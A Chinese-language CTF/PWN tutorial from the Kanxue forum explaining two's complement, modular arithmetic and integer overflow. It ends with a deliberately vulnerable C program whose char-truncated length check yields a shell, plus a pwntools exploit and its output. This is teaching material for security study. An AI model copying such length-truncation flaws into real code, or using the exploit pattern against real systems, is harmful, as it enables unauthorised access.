PWN入门：整数溢出

科技 2024-11-16 18:02 上海

整数溢出介绍

在计算机中，一个数据类型可以存储数值的容量并不是无限的，它能存储的数值容量是由数据类型占用的比特位数量决定的。

此时会有两种情况需要考虑，一是非常大的整数（所有数据类型都容不下了）应该如何去计算，二是超出类型A容量的整数存入类型A后会发生什么变化。

整数基础

为了分析并解决着两类问题，我们首先需要先了解一下计算机中整数是如何存储的。

整数是信息的一种表现形式，计算机为了表达信息就需要创造出一种语言，语言由符号组成（比如a-z，汉字等等），由于计算机由物理介质组成，想要使用英文字母进行通信就需要找到具有26种状态的物理介质，显然具有这样性质的物理介质并不容易找到。

但是具有2种状态的物理介质就非常容易搞定（比如电路的高低电平），因此计算机采用二进制计数法中作为语言表达信息（计算机中经常可以看到16进制的身影，是因为16是2的4倍，4个二进制数等于1个十六进制数）。

| 16进制	| 二进制	 |
| 0xa7		| 1010 0111 |

b1010 -> 0xa -> 0 * 2^0 + 1 * 2^1 + 0 * 2^2 + 1 * 2^3
b0111 -> 0x7 -> 1 * 2^0 + 1 * 2^1 + 1 * 2^2 + 0 * 2^3

b10100111 -> 提出2的4次方
    1 * 2^0 + 1 * 2^1 + 1 * 2^2 + 0 * 2^3 +
    0 * 2^4 + 1 * 2^5 + 0 * 2^6 + 1 * 2^7
=	1 * 2^0 + 1 * 2^1 + 1 * 2^2 + 0 * 2^3 +
    2^4 * (0 * 2^0 + 1 * 2^1 + 0 * 2^2 + 1 * 2^3)
=	0xa7

想要表达正整数，二进制计数法就足以表达意思了，但它表达负整数就不行了。

原码

可以先这样，将最高的比特位作为标志位标记正负，0xxx代表正数，1xxx代表负数，这样问题不就解决了吗。

那我们接下来再从运算角度上看看。

-2 + 1 = -1
1	-> b0001
-2  -> b1010
b1010 + b0001 = b1011 -> -3

原码并没有给正数和负数间建立数学联系，因此原码表示的负数参与进计算时出现错误是一种必然。

对于人类来讲，通过符号-在逻辑上区分正负数并不是问题，但对于计算机来讲，就比较困难了。

加法逆元与模运算

我们知道x−yx - y可以看作是x+(−y)x + (-y)，正数y的加法逆元是-y，此时我们将减法运算转换成了加法运算，那么加法逆元能不能使用正数进行表示呢？

首先我们已经知道了数据类型存储的数值数量是有上限的，一个数值超出最大值后会出现什么情况呢？答案其实很简单，把多余的部分扔掉就好了，就好比你有一个桶，满了就把水倒掉，留下空桶再继续接水，这个过程可以被称作是模运算（容量被称作是模，模运算和取余的差别在于，取模是向无穷小取整，而取余则向0取整）。

因此我们可以找到数值A（≤最大值）对应的数值B（＞最大值），使得数值B参与计算时可以起到和数值A一样的效果（水桶容量为5升，接3升水和接8升水，水桶中最后装的都是3升水，8升水中多出去的5升被倒掉了）。

对于12和4它们相加和是242^4（模232^3的整数倍），且根据模232^3进行模运算结果也是相同的，从数学上讲，具备这一类性质的数值属于同余类。

模为8
1 + 4 = 5
1 + 12 = 13 -> 13 mod 8 = 5
12 mod 8 = 4

假如将正数A看作向前进，那么对应的负数-A就相当于向后退，那么只有向后退才可以达到负数想要的效果吗？

当然不是，加上一个大于等于最大值的数值也可以。

模为5：
4 - 1 = 4 + (-1) = 3
4 + 4 = 8 -> 8 mod 5 = 3

观察上方的示例推断出，由于模的限制，在计算机中减法与加法运算结果是同余类，由此可以实现减法运算向加法运算的转变，因为加数可以是0，所以作为被加数的加法逆元，其负数表示和正数也是同余类，由此我们可以得到加法逆元的负数表示向正数表示转变的表达式−x≡M−x(modM)-x ≡ M - x (mod M)。

模记作M
0 ≤ a ＜ M, 0 ≤ x ≤ M -> |a + (-x)| ＜ M
0 ≤ a ＜ M, 2M ＞ y ≥ M -> a + y ＞ M
(a + (-x)) ≡ (a + y) (mod M)
设a = 0
-x ≡ y (mod M)
    -> (-x + y) / M = 1
    -> -x = M - y
-x ≡ M - x (mod M)

补码

在计算机中，数据类型占用n个比特位，我是用2n2^n作为模合情合理吧，那么正数继续沿用原码的表示方式，我们可以非常容易的得到负数的表示方式−x≡2n−x(mod2n)-x ≡ 2^n - x (mod 2^n)。

奇妙的二进制与反码的产生

由于计算机采用二进制表达信息，所以这里会产生一个非常有意思的事情，就是2n2^n的二进制表示格式为b1000...000，模2n2^n下最大值的二进制表示形式为b111...111，即2n−12^n -1，因此2^n减去任意数值，都相当于被减数的二进制表示取反后再加1。

假设数据类型占用4个比特位，模为2^4
-5 ≡ 2^4 - 5 (mod 2^4)
-5 ≡ 16 - 5 = 11
5  -> b0101
11 -> b1011

16 - 5
    -> b10000 - b0101 = b1 + b1111 - b0101 = b1 + b1010 = b1011

我们将以2n−12^n -1为模的计算方式称作反码。

反码的缺陷

在现在的计算机中，一般使用的都是补码，而不使用反码则是因为它存在较为致命的缺陷。

假设数据类型占用4个比特位，采用反码表示
b0000 - b0111
+0    - +7
b1000 - b1111
-7    - -0

从上方的示例中可以看到，反码表示的正数和负数中同时存在着正零值和负零值，它破坏了数值的连续性和一致性，为了规避此问题采用补码。

模运算与消失的高比特位

二进制表示的数值进行模运算，只需要根据模大小将多余的高比特位抹除就可以，这个结论对吗？

答案是肯定的，下方会给出推到过程。

∑i=0w−1xi2i(mod2n)=(xw−12w−1+⋯+x020)(mod2n)=xw−12w−1(mod2n)+⋯+x020(mod2n)=(xw−12w−1−2nxw−12w−12n)+⋯+(xn2n−2nxn2n2n)+⋯+(x020−2nx0202n)=(xw−12w−1−xw−12w−1)+⋯+∑i=0nxi2i=0++⋯+∑i=0nxi2i=∑i=0nxi2i\sum_{i=0}^{w-1}{x_i2^i\,\,\left( mod\,\,2^n \right)} \\ =\left( x_{w-1}2^{w-1}+\cdots +x_02^0 \right) \left( mod\,\,2^n \right) \\ =x_{w-1}2^{w-1}\left( mod\,\,2^n \right) +\cdots +x_02^0\left( mod\,\,2^n \right) \\ =\left( x_{w-1}2^{w-1}-2^n\frac{x_{w-1}2^{w-1}}{2^n} \right) +\cdots +\left( x_n2^n-2^n\frac{x_n2^n}{2^n} \right) +\cdots +\left( x_02^0-2^n\frac{x_02^0}{2^n} \right) \\ =\left( x_{w-1}2^{w-1}-x_{w-1}2^{w-1} \right) +\cdots +\sum_{i=0}^n{x_i2^i} \\ =0++\cdots +\sum_{i=0}^n{x_i2^i} \\ =\sum_{i=0}^n{x_i2^i}

从上面的推到中可以看出，低比特位区域的因为数值大小没有超过模所以不受影响，高比特位区域的数值自己和自己消除了，所以上方提出的结论是正确的。

总结

计算机为了减法运算而单独实现电路是非常不明智的，考虑到加法逆元可以将减法运算转变为加法运算，所以计算机使用加法运算代替减法运算。

在模运算中加法逆元的负数表示可以转变为正数表示（互为同余类），此时负数就被彻底消除。

对于计算机来讲，占据n个比特位的数据类型参与加减法运算时，它们结果天生就是模2n2^n下的同余类计算，因此补码就此产生并成为主流。

反码从二进制的角度上观察是比较有趣的（正数取反就可以），但是反码产生的数值会有不连续和不一致的问题，这样的问题应该尽量避免，所以弃用了反码。

溢出的情况分析

让整数数据类型A发生异常情况其实都可以归咎为一类，就是数据类型A被塞入了超量整数B，导致整数B进行模运算后再交给数据类型A，使数据类型A中存储的数值与数值B不相符。

在C语言中存在着两大类整数数据类型，一是无符号类型，二是有符号类型，两者的区别在于无符号类型只表示正整数，有符号类型既可以表示正整数也可以表示负整数。

其中无符号数溢出时，直接对数值取模获得可以获得新的结果。有符号数溢出时，情况会复杂一些，因为有符号数据类型虽然占用了n个比特位，但是它相当于将空间劈开了一半，正整数和负整数各占2n−12^{n - 1}，当数值溢出时，会导致最高比特位（符号位）发生变化。

在AMD64架构的机器中，有符号数据类型产生溢出时会被eflags标志寄存器中的OF标志位记录，无符号数据类型产生溢出时会被eflags标志寄存器中的CF标志位记录。

由于无符号数据类型产生溢出时不会导致符号改变，所以一般会将这种情况称作是回绕。

数据类型变化的情况分析

当宽度（占用比特位数量）更小的数据类型向宽度更大的数据类型进行转换时，不会带来什么问题，仍会保留原数值，但反之则不然。

宽度更大的数据类型向宽度更小的数据类型进行转换时，一是原数值在进行模运算后后可能出现数值上损失，二是符号位可能会发生变化，三是目标数据类型可能与源数据类型对符号位的解释不一致导致产生的数值变化。

利用思路

一个变量在程序的作用大致可以分成对外输出和作为限制条件存在两种，当我们可以控制变量时，就可以突破原有的限制条件造成破坏。

因此当我们想要利用整数类型的变量进行PWN时，首先要确定存在可以利用的变量，整数类型的变量在程序经常会被用于if语句（等其他条件语句）或者strncpy接口（等其他缓冲区变量的复制接口）中，当我们控制了变量，就可以让它跳过条件语句的检查或者往缓冲区内复制过量的数据。

显然整数溢出并不会直接导致安全问题，我们需要借助整数溢出迫使其他部分出错。

示例讲解

程序的源代码在下方给出。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define USER_CORRECT_PASSWD		"oPhTUsrFjh1iKE"

int vuln(const char* buf, char len)
{
    printf("buf size %d\n", len);
    if (strncmp(USER_CORRECT_PASSWD, buf, len) == 0) {
        system("/bin/sh");
    }
}

int main(int argc, char** argv)
{
    printf("hello int abnormal\n");

    if (argc == 2) {
        vuln(argv[1], strnlen(argv[1], 0x1000));
    }
    else {
        printf("need input\n");
    }

    return 0;
}

从上方的程序中可以看到，strnlen的返回值属于size_t类型，而vuln函数中len形参的数据类型是char，size_t明显是比char要宽的，当我们提交的argv[1]的长度超出char的容量时，就会发生溢出。

在vuln函数中会使用strncmp函数中跟预设的字符串进行比对，如果一致就会通过system函数调用Shell，它这里比较两个字符串的长度是形参len决定的，如果我们让传递给len的数值溢出到0，那么strncmp函数就不会理会待比较字符串内容永远返回0了。

exploit构造

经过上面的分析，构造出下方的exploit。

由于char类型占了1字节（8比特），所以模是282^8。

import pwn
import os

pwn.context.clear()
pwn.context.update(
    arch = 'amd64', os = 'linux',
)

target_info = {
    'exec_path': './int_abnormal',
    'char_bytes': 0x8,
}

pwn.context.binary = pwn.ELF(target_info['exec_path'])

cmdline = b'A' * (2**target_info['char_bytes'])

conn = pwn.process([target_info['exec_path'], cmdline])
conn.interactive()

成功PWN

运行exploit成功获取Shell。

[+] Starting local process './int_abnormal': pid 5236
[*] Switching to interactive mode
hello int abnormal
buf size 0
$ id
uid=1000(astaroth) gid=1000(astaroth) groups=1000(astaroth),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),114(bluetooth),117(lpadmin),121(scanner)
$ exit
[*] Got EOF while reading in interactive
$ 
[*] Process './int_abnormal' stopped with exit code 0 (pid 5236)
[*] Got EOF while sending in interactive

看雪ID：福建炒饭乡会

https://bbs.kanxue.com/user-home-1000123.htm

*本文为看雪论坛优秀文章，由福建炒饭乡会原创，转载请注明来自看雪社区

# 往期推荐

1、GL-iNet路由器安全分析

2、野蛮fuzz：深入了解代码覆盖率

3、野蛮fuzz：快照与代码覆盖率

4、Blue Water CTF 2024 re OORM wp 模拟执行爆破+剪枝

5、野蛮fuzz：尝试理解代码覆盖率

球分享

球点赞

球在看

看雪学苑

致力于移动与安全研究的开发者社区，看雪学院(kanxue.com)官方微信公众帐号。

最新文章

PWN堆unlink

30小时入门CTF——赛场大显身手

域渗透攻防 | 深入解析微软AD域渗透技巧

PWN入门：险走未知内存布局-BROP

美司法部查封PopeyeTools网络犯罪市场，其通过加密支付等方式获利170万美元

互联网公司招聘合集

惊喜开班！系统0day安全-IOT设备漏洞挖掘

Hack.lu 2024 Getting into Shape 解析

竟长达10年未发现？Ubuntu系统“needrestart”工具曝5个本地提权漏洞

UPX加载逻辑的处理细节分析

苹果紧急发布安全更新，修复影响英特尔Mac的两个零日漏洞

浏览器Pwn技术实战，解锁Chrome V8引擎攻击方法

SDC2024 议题回顾 | ExpAttack:大语言模型越狱风险持续追踪框架

攻击者利用SVG附件传播恶意代码以规避检测

Linux pwn 探索篇

“看雪漏洞小组”集结！组团挖洞，一起冲击华为漏洞更高奖励

安卓逆向基础知识之加解密算法与Hook基础

WordPress安全插件“Really Simple Security”惊现严重漏洞，数百万网站面临风险

PWN入门：整数溢出

x64dbg入门实战

野蛮fuzz：持久性fuzz

黑客使用 macOS 扩展文件属性隐藏恶意代码

求职看这里！近期新增职位盘点

修改PE导入表注入DLL——实例图文教程

以色列支付系统遭DDoS攻击，全国读卡器瘫痪

ARM系统深度调试与逆向：深入了解ARM架构3大系列

SDC2024 议题回顾 | 大模型技术在恶意软件分析中的实践

五角大楼泄密者杰克·特谢拉被判入狱15年

欢迎报名！内核驱动高级班

SDC2024 议题回顾 | 大模型软件生态系统的安全隐患：从传统漏洞到新型威胁

新型ZIP串联文件攻击针对Windows用户传播恶意软件

CTF训练营-Web篇更新：文件包含（二）一览包含技巧

SDC2024 议题回顾 | BULKHEAD：通过分隔化打造内核安全的水密舱

马自达汽车系统漏洞引发安全危机：黑客可执行任意代码

【入门篇】Android漏洞挖掘，实战演示挖掘技巧

GL-iNet路由器安全分析

FART 脱壳王：突破加壳APP的层层保护

SDC2024 议题回顾 | 探秘语法树：反编译引擎驱动自动化漏洞挖掘

限时限量！双11看雪课程补贴券，即领即用

法式幽默？黑客要求施耐德电气以40万根法棍面包作为赎金

求职看这里！近期新增职位盘点

野蛮fuzz：深入了解代码覆盖率

黑客可随意访问EA公司7亿用户账号

预付全款！看雪课程讲师招募中

SDC2024 议题回顾 | 工控系统供应链攻击大揭秘

全是干货！2024 vivo千镜安全实验室技术沙龙报名开启

Ollama AI框架发现严重漏洞，可能导致 DoS、模型盗窃和中毒

预付全款！看雪课程讲师招募中

野蛮fuzz：快照与代码覆盖率

平行切面联盟：升级技术合作，加速生态共建，助力数字化转型可持续发展

分类

时事

民生

政务

教育

文化

科技

财富

体娱

健康

情感

旅行

百科

职场

楼市

企业

乐活

学术

汽车

时尚

创业

美食

幽默

美体

文摘

原创标签

时事社会财经军事教育体育科技汽车科学房产搞笑综艺明星音乐动漫游戏时尚健康旅游美食生活摄影宠物职场育儿情感小说曲艺文化历史三农文学娱乐电影视频图片新闻宗教电视剧纪录片广告创意壁纸头像心灵鸡汤星座命理教育培训艺术文化金融财经健康医疗美妆时尚餐饮美食母婴育儿社会新闻工业农业时事政治星座占卜幽默笑话独立短篇连载作品文化历史科技互联网

发布位置

广东北京山东江苏河南浙江山西福建河北上海四川陕西湖南安徽湖北内蒙古江西云南广西甘肃辽宁黑龙江贵州新疆重庆吉林天津海南青海宁夏西藏香港澳门台湾美国加拿大澳大利亚日本新加坡英国西班牙新西兰韩国泰国法国德国意大利缅甸菲律宾马来西亚越南荷兰柬埔寨俄罗斯巴西智利卢森堡芬兰瑞典比利时瑞士土耳其斐济挪威朝鲜尼日利亚阿根廷匈牙利爱尔兰印度老挝葡萄牙乌克兰印度尼西亚哈萨克斯坦塔吉克斯坦希腊南非蒙古奥地利肯尼亚加纳丹麦津巴布韦埃及坦桑尼亚捷克阿联酋安哥拉